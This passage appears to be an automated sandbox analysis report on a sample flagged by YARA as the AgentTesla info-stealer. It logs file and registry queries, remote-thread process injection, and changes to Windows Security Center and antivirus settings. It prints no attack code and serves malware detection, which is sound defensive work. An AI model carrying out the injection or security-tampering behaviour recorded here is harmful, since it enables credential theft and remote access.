                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,6_2_0040A272

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 00000010.00000002.556137517.0000022F49629000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.25.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.25.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.29.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3e21420.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.38b97a0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3ef0098.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3ef0098.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.39197e0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3e81c80.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38b97a0.24.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38b97a0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.38d97c0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.38d97c0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.28.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.31.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.29.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38b97a0.30.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.31.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3e41440.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.39197e0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.28.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.436158543.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.588256996.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.431825282.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.434117466.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.432432130.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.374239562.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.374484408.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: VknMvPoCXZ.exe PID: 2244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4496, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.25.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.25.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.29.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3e21420.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.38b97a0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3ef0098.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3ef0098.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.39197e0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3e81c80.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38b97a0.24.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38b97a0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.38d97c0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.38d97c0.7.unpack, type: UNPACKEDPE
